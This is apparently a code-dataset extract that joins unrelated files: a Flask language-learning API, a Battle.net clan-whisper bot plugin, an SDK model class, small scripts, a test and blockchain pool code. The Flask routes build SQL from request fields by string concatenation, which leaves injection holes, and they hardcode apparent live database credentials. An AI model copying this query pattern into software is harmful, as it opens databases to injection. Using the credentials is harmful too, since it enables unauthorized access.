lang_model = Doc2Vec.load(KEY1)
return lang_model
def langname(lang_select):
if lang_select == 'es':
langt = 'Spanish'
if lang_select == 'fr':
langt = 'French'
if lang_select == 'de':
langt = 'German'
if lang_select == 'en':
langt = 'English'
return langt
def list_routes():
return ['%s' % rule for rule in app.url_map.iter_rules()]
@application.route("/")
def hello():
routelinks = list_routes()
html = "<h1 style='color:blue'>Routes</h1>"
for link in routelinks:
html += '<P><H3>'+link+'</H3></P>'
return html
@application.route("/apis/single_art", methods=['POST'])
def single_art():
#trans_art = request.json['trans_art']
trans_lang = request.json['trans_lang']
art_id = request.json['art_id']
colnm = trans_lang + '_arts'
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql = "SELECT link,title,article,art_id FROM " + colnm + " WHERE art_id = '" + art_id + "'"
cur.execute(sql)
article1 = cur.fetchone()
dictart = {'link':article1[0],'title':article1[1],'article':article1[2],'art_id':article1[3]}
conn.close()
resp=json.dumps(dictart)
return resp
@application.route("/apis/link_search", methods=['POST'])
def link_search():
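    # Pipeline sketch: fetch and translate the linked article, strip stop
    # words, infer a Doc2Vec vector for it, cosine-rank recent article vectors
    # against it, then load the top matches' links and titles from Postgres.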
def trans_art(link,trans_lang):
art,link,title = art_parser(link)
trans_art = [str(TextBlob(art).translate(to=trans_lang))]
return trans_art,title
#trans_art = request.json['trans_art']
trans_lang = request.json['trans_lang']
link = request.json['link']
daterange = request.json['daterange']
trans_art,title = trans_art(link,trans_lang)
if trans_lang == 'es':
langt = 'Spanish'
lang_model = eslang_model
colnm = trans_lang +'_arts'
if trans_lang == 'fr':
langt = 'French'
lang_model = frlang_model
colnm = trans_lang +'_arts'
if trans_lang == 'de':
langt = 'German'
lang_model = delang_model
colnm = trans_lang +'_arts'
stop_words = get_stop_words(trans_lang)
histnostop = [[i for i in doc.lower().split() if i not in stop_words] for doc in trans_art]
dlhist_tagged = [TaggedDocument(doc,[i]) for i,doc in enumerate(histnostop)]
## infer vectors from current doc2model
trans_lang_vec = [lang_model.infer_vector(doc.words) for doc in dlhist_tagged]
rec_num = 20
#sims = lang_model.docvecs.most_similar(trans_lang_vec, topn=rec_num)
#load to time matrix
vec_range = recent_arts(trans_lang,daterange)
rankedvec = cosine_rank(trans_lang_vec,vec_range,rec_num)
sims1= [x[1] for x in rankedvec]
sims2= tuple(sims1)
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT link,title,art_id FROM " + colnm + " WHERE art_id IN %s"
cur.execute(sql,(sims2,))
recs = cur.fetchall()
dictrecs = [{'link':x[0],'title':x[1],'art_id':x[2]} for x in recs]
conn.close()
payload = {'recs':dictrecs,'link':link,'title':title,'trans_lang':trans_lang,'langt':langt}
resp=json.dumps(payload)
return resp
@application.route("/apis/link_search_pg", methods=['POST'])
def link_search_pg():
def trans_art(link,trans_lang):
art,link,title = art_parser(link)
trans_art = [str(TextBlob(art).translate(to=trans_lang))]
return trans_art,title
#trans_art = request.json['trans_art']
trans_lang = request.json['trans_lang']
link = request.json['link']
trans_art,title = trans_art(link,trans_lang)
if trans_lang == 'es':
langt = 'Spanish'
lang_model = eslang_model
colnm = trans_lang +'_arts'
if trans_lang == 'fr':
langt = 'French'
lang_model = frlang_model
colnm = trans_lang +'_arts'
if trans_lang == 'de':
langt = 'German'
lang_model = delang_model
colnm = trans_lang +'_arts'
stop_words = get_stop_words(trans_lang)
histnostop = [[i for i in doc.lower().split() if i not in stop_words] for doc in trans_art]
dlhist_tagged = [TaggedDocument(doc,[i]) for i,doc in enumerate(histnostop)]
## infer vectors from current doc2model
trans_lang_vec = [lang_model.infer_vector(doc.words) for doc in dlhist_tagged]
rec_num = 20
sims = lang_model.docvecs.most_similar(trans_lang_vec, topn=rec_num)
sims1= [int(x[0]) for x in sims]
sims2= tuple(sims1)
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT link,title,art_id FROM " + colnm + " WHERE id IN %s"
cur.execute(sql,(sims2,))
recs = cur.fetchall()
dictrecs = [{'link':x[0],'title':x[1],'art_id':x[2]} for x in recs]
conn.close()
payload = {'recs':dictrecs,'link':link,'title':title,'trans_lang':trans_lang,'langt':langt}
dump = [payload,sims2]
resp=json.dumps(payload)
return resp
@application.route("/apis/vocab_ins", methods=['POST'])
def vocab_ins():
vocab_word = request.json['vocab_word']
trans_word = request.json['trans_word']
user_id = request.json['user_id']
date = request.json['date']
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
QueryData = "('"+ user_id +"','" + vocab_word + "','" + trans_word +"','"+ date +"')"
cur.execute('INSERT INTO vocab (user_id,word,translation,date) VALUES ' + QueryData)
conn.commit()
    conn.close()
payload = { 'vocab_word': vocab_word, 'trans_word': trans_word}
resp=json.dumps(payload)
return resp
@application.route("/apis/exer_progress", methods=['POST'])
def exer_progress():
lang_select = request.json['lang_select']
item = request.json['item']
user_id = request.json['user_id']
exer_date = request.json['exer_date']
exer_type = request.json['exer_type']
exer_resp = request.json['exer_resp']
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
QueryData = "('"+ lang_select +"','" + item + "','" + user_id +"','"+ exer_date +"','"+ exer_type +"','"+ str(exer_resp) +"')"
cur.execute('INSERT INTO exer_progress (lang,item,user_id,exer_date,exer_type,exer_resp) VALUES ' + QueryData)
conn.commit()
    conn.close()
payload = { 'item ': item , 'exer_resp': exer_resp}
resp=json.dumps(payload)
return resp
@app.route("/apis/art_recs", methods=['GET','POST'])
def art_recs():
lang_select = request.args.get('values')
trans_lang = request.args.get('trans_lang')
user_id = session.get('user_id')
db_name = 'arts_recs'
colnm = trans_lang +'_arts'
link_recs = []
clusters = [['46c47616895140a28fcf5f7c368357ae',
'43db6fcc5bd14b4584d78478ef8a4831',
'39ff78c46b1b4db6baa2a84a670c84ba'],
['6404d798aa1547fca35f11693328d318',
'424be85fad2c4448b944e7e795df857e',
'008a5bdb929a4360b2a113feed312bf5'],
['1bd11f965c934560b0caa0c7e29388d1',
'213478cc4a904f279ef38e52d2b0e7d4',
'bb77defbe39c4d0da78ca28c9d82a8bd']
]
rec_clusters = []
for cluster in clusters:
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT link,title,art_id FROM " + colnm + " WHERE art_id IN %s"
        cur.execute(sql, (tuple(cluster),))  # psycopg2 adapts a tuple (not a list) to an SQL list for IN
recs = cur.fetchall()
dictrecs = [{'link':x[0],'title':x[1],'art_id':x[2]} for x in recs]
rec_clusters.append(dictrecs)
conn.close()
    #link_recs = [[gcol.find_one({ "id" : db_id },projection={'_id': False,'title':True,'link':True,'id':True}) for db_id in db_ids] for db_ids in recs]
    # Flask view functions of this era cannot return a bare list, so serialize it.
    return json.dumps(rec_clusters)
@app.route("/apis/image_rec", methods=['GET','POST'])
def image_rec():
lang_select = request.json['lang_select']
colnm = lang_select+'_pics'
langt = langname(lang_select)
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT link,term FROM " + colnm + " ORDER BY random() LIMIT 1"
cur.execute(sql)
pic= cur.fetchall()
conn.close()
payload = {'link':pic[0][0],'term':pic[0][1],'lang_select':lang_select,'langt':langt}
resp=json.dumps(payload)
return resp
@app.route("/apis/verbcompletion", methods=['GET','POST'])
def verb_comp():
lang_select = request.json['lang_select']
native_lang = request.json['native_lang']
db_name = 'sent_combo'
def verb_random():
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT verb FROM sc_verbs ORDER BY random() LIMIT 1"
cur.execute(sql)
verb = cur.fetchone()
conn.close()
return verb[0]
def noun_random():
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT noun FROM sc_nouns ORDER BY random() LIMIT 1"
cur.execute(sql)
noun = cur.fetchone()
conn.close()
return noun[0]
def gen_sent():
verb = verb_random()
noun = noun_random()
article = ['a','the']
j = randint(0,1)
art = article[j]
return verb + ' ' + art + ' ' + noun
sent = gen_sent()
blob = TextBlob(sent)
learn_sent = blob.translate(to=lang_select)
native_sent = str(learn_sent.translate(to=native_lang)).capitalize()
trans_sent = str(learn_sent).capitalize()
langt = langname(lang_select)
payload = {'trans_sent':trans_sent,'native_sent':native_sent,'lang_select':lang_select,'langt':langt}
resp=json.dumps(payload)
return resp
@app.route("/apis/sentcompletion", methods=['GET','POST'])
def sent_comp():
lang_select = request.json['lang_select']
pos1 = request.json['pos']
colnm = lang_select+'_sents'
conn = psycopg2.connect(dbconnect)
cur = conn.cursor()
sql="SELECT blanks,answer,speech,id FROM " + colnm + " WHERE pos = '" + pos1 + "' ORDER BY random() LIMIT 1"
cur.execute(sql)
sent = cur.fetchall()
conn.close()
langt = langname(lang_select)
payload = {'item_id':str(sent[0][3]),'exer_blanks':sent[0][0],'translate':sent[0][2],'answer':sent[0][1],'lang_select':lang_select,'langt':langt}
resp=json.dumps(payload)
return resp
@app.route("/apis/translate_tt", methods=['GET','POST'])
def translate_tt():
lang = request.json['lang']
text = request.json['text']
gs = goslate.Goslate()
translatedtext = gs.translate(text,lang)
payload = {'translatedText':translatedtext}
resp=json.dumps(payload)
return resp
@app.route("/apis/prog_list", methods=['GET','POST'])
def prog_list():
user_id = request.json['user_id']
progressuserid = user_prog_list(user_id)
payload = {'progressuserid':progressuserid}
resp=json.dumps(payload)
return resp
@app.route("/apis/user_detail", methods=['GET','POST'])
def user_detail():
user_id = request.json['user_id']
login_status = 'on_line'
last_login = str(datetime.now())
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
sql = "UPDATE user_ids SET login_status = '" + login_status +"',last_login='"+ last_login+"' WHERE user_id = '" + user_id + "'"
cur.execute(sql)
conn.commit()
sql1 = "select id,native_lang,learning,user_id,name from user_ids where user_id='"+ user_id + "'"
cur.execute(sql1)
user_rslt = cur.fetchone()
native_lang = user_rslt[1]
user_pk_id = user_rslt[0]
learning = user_rslt[2]
user_id = user_rslt[3]
name = user_rslt[4]
conn.close()
payload = {'native_lang':native_lang,'learning':learning,'user_id':user_id,'name':name}
resp=json.dumps(payload)
return resp
@app.route("/apis/friends_search", methods=['GET','POST'])
def friends_search():
age_src = request.json['age_src']
srch_native_lang = request.json['srch_native_lang']
gender = request.json['gender']
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
if len(age_src)>0:
agelow = str(age_src[0])
agehigh = str(age_src[1])
age_qry = " AND age BETWEEN " + agelow + " AND " + agehigh
else:
age_qry = ''
sql="SELECT name,native_lang,sex,residence,age,(now() - last_login),id FROM user_ids WHERE sex = '" + gender + "' AND native_lang = '" + srch_native_lang + "'" + age_qry
cur.execute(sql)
friend_rslt = cur.fetchall()
conn.close()
friends = [{'name':item[0],'native_lang':item[1],'gender':item[2],'residnce':item[3],'age':str(item[4]),"last_login_time":str(item[5].days) + ' days','id':item[6]} for item in friend_rslt]
payload = {'friends':friends}
resp=json.dumps(payload)
return resp
@app.route("/apis/friends_relationship", methods=['GET','POST'])
def friends_relationship():
user_id_friend = request.json['user_id_friend']
status = request.json['status']
user_friends = friend_list(user_id_friend,status)
payload = user_friends
resp=json.dumps(payload)
return resp
@app.route("/apis/friend_request", methods=['GET','POST'])
def friends_request():
user_id_friend = request.json['user_id_friend']
req_type = request.json['req_type']
requested_id = request.json['requested_id']
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
if req_type == 'friend_request':
request_date = datetime.now()
status = 1
req_data = (user_id_friend,requested_id,status,request_date)
sql='INSERT INTO relationships (userid1,userid2,status,request_date) VALUES (%s, %s, %s,%s)'
message = "Request Made " + request_date.strftime('%m/%d/%Y')
cur.execute(sql,req_data )
conn.commit()
conn.close()
    if req_type == 'friend_acceptance':
        status = str(2)
        accept_date = datetime.now()
        # The original statement mixed INSERT syntax into an UPDATE; a valid
        # UPDATE needs SET, and (assumption) the row is keyed on the two user
        # ids carried by the request.
        accept_data = (status, accept_date, user_id_friend, requested_id)
        sql = 'UPDATE relationships SET status = %s, accept_date = %s WHERE userid1 = %s AND userid2 = %s'
        message = "Request Accept " + accept_date.strftime('%m/%d/%Y')
        cur.execute(sql, accept_data)
        conn.commit()
        conn.close()
payload = {'message':message}
resp=json.dumps(payload)
return resp
if __name__ == '__main__':
app.debug = True
application.run(host='0.0.0.0',port='8484')
| 36.756272 | 391 | 0.648805 |
75bbc0975c32e0e5597a12509bb1c6487fe66953 | 2,629 | py | Python | plugins/cnotify.py | followy0urdream/ghost.py | 223d507778f194463a1737afd81b316c8d4dcac8 | ["MIT"] | 6 | 2017-03-21T19:45:22.000Z | 2021-11-02T10:26:49.000Z | plugins/cnotify.py | followy0urdream/ghost.py | 223d507778f194463a1737afd81b316c8d4dcac8 | ["MIT"] | null | null | null | plugins/cnotify.py | followy0urdream/ghost.py | 223d507778f194463a1737afd81b316c8d4dcac8 | ["MIT"] | 4 | 2017-12-18T15:12:17.000Z | 2020-11-23T17:34:29.000Z |
import eventlet
import hook, bnetprotocol
from misc import *
from config import config
clantrack = hook.import_plugin('clantrack')
parsed_settings = {}
def parse_settings():
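    # Walk numbered config sections (cnotify0, cnotify1, ...) until the first
    # missing index raises KeyError; xrange(9001) is just a generous upper
    # bound on how many sections are scanned.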
for i in xrange(9001):
try:
settings = config[__name__.split('.')[-1] + str(i)]
except KeyError:
break
parsed_settings[i] = {}
ignore = int(settings.get('ignore', '0'))
parsed_settings[i]['ignore'] = ignore
if ignore:
continue
parsed_settings[i]['minrank'] = int(settings['minrank'])
parsed_settings[i]['command'] = settings['command']
parsed_settings[i]['clantrack_pool'] = settings['clantrack_pool']
spam_locks = {}
def message_received(bn, d):
if parsed_settings[bn.id]['ignore']:
return
if d.event == bnetprotocol.EID_TALK:
msg_list = str(d.message).split(' ', 1)
try:
command, payload = msg_list
except ValueError:
command = msg_list[0]
payload = ''
if command == parsed_settings[bn.id]['command'] and len(payload) > 0 \
and clantrack.get_clanmember_rank(bn, str(d.user)) >= int(parsed_settings[bn.id]['minrank']):
onlinenames = clantrack.get_online_clanmembers(bn)
pool = clantrack.bn_to_pool(bn)
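            # One boolean lock per clantrack pool prevents overlapping notify
            # runs; whispers are round-robined across the pool's connections
            # and rate-limited (3 seconds spread over bn_count bots).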
if spam_locks.get(pool, False) == False:
spam_locks[pool] = True
bn_pool = clantrack.list_of_bnet_objects(pool)
bn_count = len(bn_pool)
bn_i = 0
current_bn = bn_pool[0]
current_bn.send_packet(bnetprotocol.SEND_SID_CHATCOMMAND('Adding %d to Clan Notify List' % len(onlinenames)))
for i in onlinenames:
current_bn, bn_i = next_in_circular_list(bn_pool, bn_i)
current_bn.send_packet(bnetprotocol.SEND_SID_CHATCOMMAND('/w %s %s' % (i, payload)))
atomic_debug('whispering to %s using %s' % (i, repr(current_bn)))
eventlet.sleep(3./bn_count)
current_bn, bn_i = next_in_circular_list(bn_pool, bn_i)
current_bn.send_packet(bnetprotocol.SEND_SID_CHATCOMMAND(', '.join(clantrack.clantags_in_pool(pool)) + ' Done sending messages.'))
spam_locks[pool] = False
else:
atomic_debug('pool %d is spamlocked' % pool)
def install():
parse_settings()
hook.register('after-handle_sid_chatevent', message_received)
def uninstall():
hook.unregister('after-handle_sid_chatevent', message_received)
| 38.101449 | 146 | 0.593762 |
5e3ecbb75a4e2cdde1f86dd70612efb9f977e6dd | 4,651 | py | Python | huaweicloud-sdk-oms/huaweicloudsdkoms/v2/model/smn_info.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 64 | 2020-06-12T07:05:07.000Z | 2022-03-30T03:32:50.000Z | huaweicloud-sdk-oms/huaweicloudsdkoms/v2/model/smn_info.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 11 | 2020-07-06T07:56:54.000Z | 2022-01-11T11:14:40.000Z | huaweicloud-sdk-oms/huaweicloudsdkoms/v2/model/smn_info.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | ["Apache-2.0"] | 24 | 2020-06-08T11:42:13.000Z | 2022-03-04T06:44:08.000Z |
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SmnInfo:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'notify_result': 'bool',
'notify_error_message': 'str',
'topic_name': 'str'
}
attribute_map = {
'notify_result': 'notify_result',
'notify_error_message': 'notify_error_message',
'topic_name': 'topic_name'
}
def __init__(self, notify_result=None, notify_error_message=None, topic_name=None):
"""SmnInfo - a model defined in huaweicloud sdk"""
self._notify_result = None
self._notify_error_message = None
self._topic_name = None
self.discriminator = None
if notify_result is not None:
self.notify_result = notify_result
if notify_error_message is not None:
self.notify_error_message = notify_error_message
if topic_name is not None:
self.topic_name = topic_name
@property
def notify_result(self):
"""Gets the notify_result of this SmnInfo.
记录迁移任务执行完毕后SMN消息是否发送成功。
:return: The notify_result of this SmnInfo.
:rtype: bool
"""
return self._notify_result
@notify_result.setter
def notify_result(self, notify_result):
"""Sets the notify_result of this SmnInfo.
记录迁移任务执行完毕后SMN消息是否发送成功。
:param notify_result: The notify_result of this SmnInfo.
:type: bool
"""
self._notify_result = notify_result
@property
def notify_error_message(self):
"""Gets the notify_error_message of this SmnInfo.
记录SMN消息发送失败原因的错误码(迁移任务成功时为空)。
:return: The notify_error_message of this SmnInfo.
:rtype: str
"""
return self._notify_error_message
@notify_error_message.setter
def notify_error_message(self, notify_error_message):
"""Sets the notify_error_message of this SmnInfo.
记录SMN消息发送失败原因的错误码(迁移任务成功时为空)。
:param notify_error_message: The notify_error_message of this SmnInfo.
:type: str
"""
self._notify_error_message = notify_error_message
@property
def topic_name(self):
"""Gets the topic_name of this SmnInfo.
SMN Topic的名称(SMN消息发送成功时为空)。
:return: The topic_name of this SmnInfo.
:rtype: str
"""
return self._topic_name
@topic_name.setter
def topic_name(self, topic_name):
"""Sets the topic_name of this SmnInfo.
SMN Topic的名称(SMN消息发送成功时为空)。
:param topic_name: The topic_name of this SmnInfo.
:type: str
"""
self._topic_name = topic_name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SmnInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
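# A minimal usage sketch (not part of the SDK source; field values are
# assumptions for illustration): construct the model, then serialize it.
if __name__ == "__main__":
    demo = SmnInfo(notify_result=True, topic_name="migration-done")
    print(demo.to_dict())  # {'notify_result': True, 'notify_error_message': None, 'topic_name': 'migration-done'}
    print(demo.to_str())   # JSON string via simplejson (required by to_str)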
| 27.52071 | 87 | 0.58439 |
60aee9c1913979c0fd914bb77b0939fb8b1aadb0 | 492 | py | Python | General2.py | work-acc/praktika10 | 64fba67d0704a60ff8178e774cf1e3132cfd7476 | ["MIT"] | null | null | null | General2.py | work-acc/praktika10 | 64fba67d0704a60ff8178e774cf1e3132cfd7476 | ["MIT"] | null | null | null | General2.py | work-acc/praktika10 | 64fba67d0704a60ff8178e774cf1e3132cfd7476 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import math
def cylinder(r, h, full=True):
def circle(r):
return math.pi * (r ** 2)
s_cylinder = 2 * math.pi * r * h
if full:
return s_cylinder + 2 * circle(r)
    else:
        # Returning (not printing) keeps the caller's `s = cylinder(...)` from
        # ending up as None when only the lateral surface is requested.
        return s_cylinder
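# Worked example (assumed inputs): cylinder(1.0, 2.0) with full=True gives
# 2*pi*1*2 + 2*pi*1**2 = 6*pi ~= 18.85, i.e. lateral surface plus both caps.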
if __name__ == '__main__':
s_circle = 0
a = float(input("Введите радиус: "))
b = float(input("Введите высоту: "))
c = input("side or full?")
s = cylinder(a, b, full=(c == 'full'))
print(s)
| 18.222222 | 42 | 0.54065 |
8b0877ce12d8747414a15746ff0f428a9f091b0d | 2,387 | py | Python | settings_example.py | alanmitchell/fnsb-benchmark | b7b8066d6adadfb13758fa5c77fa0e52175a6211 | ["MIT"] | null | null | null | settings_example.py | alanmitchell/fnsb-benchmark | b7b8066d6adadfb13758fa5c77fa0e52175a6211 | ["MIT"] | 25 | 2017-10-19T17:28:43.000Z | 2017-10-20T22:36:50.000Z | settings_example.py | alanmitchell/fnsb-benchmark | b7b8066d6adadfb13758fa5c77fa0e52175a6211 | ["MIT"] | null | null | null |
"""This file is an example settings.py file, which controls aspects of
how the benchmark.py script will run.
Copy this file to a file named "settings.py" in this directory, and then
modify the settings in that file, not this example file.
The settings file is a standard Python module, so Python expressions or any
type of Python code is possible.
"""
# This is the path to the Utility Bill CSV file that will be read by the
# benchmark script. The path should be expressed relative to this directory
# (the directory where settings.py and benchmark.py reside).
#(string file path, use forward slashes for directory separators)
UTILITY_BILL_FILE_PATH = 'data/20171017_AllDataExport.CSV'
# This is the path to the Other Data directory that hold the Buildings.xlsx
# and Fuels.xlsx spreadsheets. Those spreadsheets
# give information about the buildings being benchmarked and general
# energy data. (string directory path, use forward slashes for directory separators)
OTHER_DATA_DIR_PATH = 'data/'
# Set the following to True if you want to use the same Utility Bill and Other
# Data from the last run of the benchmark script. This will substantially
# speed up the time required to run the script, since reading the CSV file and
# preprocessing the data are skipped. Useful for debugging code that doesn't
# affect the preprocessing routine. (True / False)
USE_DATA_FROM_LAST_RUN = False
# If the following setting is True, debug information will be written to the
# 'output/debug' directory, including the raw variable values that are passed
# to the HTML reporting template. (True / False)
WRITE_DEBUG_DATA = False
# If you are debugging or modifying the code in the benchmark script, it is
# convenient to only run some of the sites through the benchmark script to save
# time. Set the number of sites you want to run in the setting below. If you
# want to run all the sites, set the value to 0. The sites are processed in
# alphabetical order based on their Site ID. (integer)
MAX_NUMBER_SITES_TO_RUN = 0
# ------------------------------------------------------------------------------
# The settings below here only apply to use of this script with AHFC ARIS data.
# Base URL to the ARIS API
ARIS_API_URL = 'http://arisapi.test.ahfc.us/api/buildingenergy'
# Username and Password for the ARIS API
ARIS_USERNAME = 'the_user_name'
ARIS_PASSWORD = 'the_password'
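# Minimal usage sketch: how a consumer script such as benchmark.py (named in
# the comments above) might read this module. The `all_sites` list and the
# slicing logic are assumptions for illustration, not part of this project.
#     import settings
#     sites = sorted(all_sites)  # hypothetical list of Site IDs from the CSV
#     if settings.MAX_NUMBER_SITES_TO_RUN:
#         sites = sites[:settings.MAX_NUMBER_SITES_TO_RUN]
#     csv_path = settings.UTILITY_BILL_FILE_PATH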
| 46.803922
| 84
| 0.75199
|
91072824586cc030c54bf6b1626e29bb52aed9f6
| 2,451
|
py
|
Python
|
tests/integration/test_repeat.py
|
mferreravila/cunumeric
|
87901174d0ecb1719bbccb98201dc19034973834
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_repeat.py
|
mferreravila/cunumeric
|
87901174d0ecb1719bbccb98201dc19034973834
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_repeat.py
|
mferreravila/cunumeric
|
87901174d0ecb1719bbccb98201dc19034973834
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021-2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import pytest
from test_tools.generators import mk_seq_array
import cunumeric as num
from legate.core import LEGATE_MAX_DIM
np.random.seed(12345)
def test_basic():
assert np.array_equal(num.repeat(3, 4), np.repeat(3, 4))
assert np.array_equal(num.repeat([3, 1], 4), np.repeat([3, 1], 4))
def test_axis():
anp = np.array([1, 2, 3, 4, 5])
a = num.array(anp)
repnp = np.array([1, 2, 1, 2, 1])
rep = num.array(repnp)
print(num.repeat(a, rep, axis=0))
print(np.repeat(anp, repnp, axis=0))
assert np.array_equal(
num.repeat(a, rep, axis=0), np.repeat(anp, repnp, axis=0)
)
xnp = np.array([[1, 2], [3, 4]])
x = num.array([[1, 2], [3, 4]])
assert np.array_equal(
num.repeat(x, [1, 2], axis=0), np.repeat(xnp, [1, 2], axis=0)
)
assert np.array_equal(num.repeat(x, 0, axis=0), np.repeat(xnp, 0, axis=0))
@pytest.mark.parametrize("ndim", range(1, LEGATE_MAX_DIM + 1))
def test_nd(ndim):
a_shape = tuple(np.random.randint(1, 9) for _ in range(ndim))
np_array = mk_seq_array(np, a_shape)
num_array = mk_seq_array(num, a_shape)
repeats = np.random.randint(0, 15)
res_num = num.repeat(num_array, repeats)
res_np = np.repeat(np_array, repeats)
assert np.array_equal(res_num, res_np)
for axis in range(0, ndim):
res_num2 = num.repeat(num_array, repeats, axis)
res_np2 = np.repeat(np_array, repeats, axis)
assert np.array_equal(res_num2, res_np2)
rep_shape = (a_shape[axis],)
rep_arr_np = mk_seq_array(np, rep_shape)
rep_arr_num = mk_seq_array(num, rep_shape)
res_num3 = num.repeat(num_array, rep_arr_num, axis)
res_np3 = np.repeat(np_array, rep_arr_np, axis)
assert np.array_equal(res_num3, res_np3)
if __name__ == "__main__":
import sys
pytest.main(sys.argv)
| 33.121622
| 78
| 0.671971
|
0546ca539902d174e3e900a13203a738f8f49301
| 16,940
|
py
|
Python
|
chives/pools/pool_puzzles.py
|
zcomputerwiz/chives-blockchain
|
73d268bf76f50ff6133c868b58891e75739a2708
|
[
"Apache-2.0"
] | 75
|
2021-06-27T03:30:59.000Z
|
2022-03-20T12:32:55.000Z
|
chives/pools/pool_puzzles.py
|
zcomputerwiz/chives-blockchain
|
73d268bf76f50ff6133c868b58891e75739a2708
|
[
"Apache-2.0"
] | 39
|
2021-07-02T07:11:24.000Z
|
2022-03-20T15:00:07.000Z
|
chives/pools/pool_puzzles.py
|
zcomputerwiz/chives-blockchain
|
73d268bf76f50ff6133c868b58891e75739a2708
|
[
"Apache-2.0"
] | 41
|
2021-06-24T11:24:43.000Z
|
2022-03-14T16:11:38.000Z
|
import logging
from typing import Tuple, List, Optional
from blspy import G1Element
from clvm.casts import int_from_bytes, int_to_bytes
from chives.clvm.singleton import SINGLETON_LAUNCHER
from chives.consensus.block_rewards import calculate_pool_reward
from chives.consensus.coinbase import pool_parent_id
from chives.pools.pool_wallet_info import PoolState, LEAVING_POOL, SELF_POOLING
from chives.types.blockchain_format.coin import Coin
from chives.types.blockchain_format.program import Program, SerializedProgram
from chives.types.blockchain_format.sized_bytes import bytes32
from chives.types.coin_spend import CoinSpend
from chives.wallet.puzzles.load_clvm import load_clvm
from chives.wallet.puzzles.singleton_top_layer import puzzle_for_singleton
from chives.util.ints import uint32, uint64
log = logging.getLogger(__name__)
# "Full" is the outer singleton, with the inner puzzle filled in
SINGLETON_MOD = load_clvm("singleton_top_layer.clvm")
POOL_WAITING_ROOM_MOD = load_clvm("pool_waitingroom_innerpuz.clvm")
POOL_MEMBER_MOD = load_clvm("pool_member_innerpuz.clvm")
P2_SINGLETON_MOD = load_clvm("p2_singleton_or_delayed_puzhash.clvm")
POOL_OUTER_MOD = SINGLETON_MOD
POOL_MEMBER_HASH = POOL_MEMBER_MOD.get_tree_hash()
POOL_WAITING_ROOM_HASH = POOL_WAITING_ROOM_MOD.get_tree_hash()
P2_SINGLETON_HASH = P2_SINGLETON_MOD.get_tree_hash()
POOL_OUTER_MOD_HASH = POOL_OUTER_MOD.get_tree_hash()
SINGLETON_LAUNCHER_HASH = SINGLETON_LAUNCHER.get_tree_hash()
SINGLETON_MOD_HASH = POOL_OUTER_MOD_HASH
SINGLETON_MOD_HASH_HASH = Program.to(SINGLETON_MOD_HASH).get_tree_hash()
def create_waiting_room_inner_puzzle(
target_puzzle_hash: bytes32,
relative_lock_height: uint32,
owner_pubkey: G1Element,
launcher_id: bytes32,
genesis_challenge: bytes32,
delay_time: uint64,
delay_ph: bytes32,
) -> Program:
pool_reward_prefix = bytes32(genesis_challenge[:16] + b"\x00" * 16)
p2_singleton_puzzle_hash: bytes32 = launcher_id_to_p2_puzzle_hash(launcher_id, delay_time, delay_ph)
return POOL_WAITING_ROOM_MOD.curry(
target_puzzle_hash, p2_singleton_puzzle_hash, bytes(owner_pubkey), pool_reward_prefix, relative_lock_height
)
def create_pooling_inner_puzzle(
target_puzzle_hash: bytes,
pool_waiting_room_inner_hash: bytes32,
owner_pubkey: G1Element,
